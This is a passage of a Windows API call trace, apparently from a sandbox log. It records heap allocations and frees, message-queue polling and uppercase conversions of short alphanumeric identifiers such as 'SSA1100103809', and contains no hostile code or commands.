(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0205.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0205.169] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0205.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0205.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0205.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0205.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0205.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0205.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0205.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.173] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8e8 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.173] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0205.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0205.173] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0205.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0205.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0205.174] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa08 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f68 [0205.174] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0205.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0205.174] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0205.175] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0205.175] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0205.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0205.176] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0205.176] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.176] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b30 [0205.176] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0205.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0205.177] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: 